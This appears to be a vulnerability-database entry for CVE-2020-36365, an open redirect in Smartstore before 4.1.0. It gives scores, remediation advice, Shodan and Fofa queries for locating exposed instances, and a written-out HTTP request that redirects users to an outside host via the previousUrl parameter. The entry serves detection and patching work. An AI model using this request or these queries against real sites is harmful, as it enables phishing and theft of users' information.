🔙 목록으로 돌아가기

CVE-2020-36365: Smartstore <4.1.0 - Open Redirect

TitleSmartstore <4.1.0 - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
RemediationUpgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.09448
CVE IDCVE-2020-36365
CWE IDCWE-601
Shodan Queryhttp.html:'content="Smartstore'http.html:'content="smartstore'
Fofa Querybody='content="smartstore'
Tags cve2020 cve redirect smartstore vuln

🔍 Vulnerability Description

Smartstore (aka “SmartStoreNET”) before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /backend/admin/common/clearcache?previousUrl=http://www.interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36365.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-36365.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A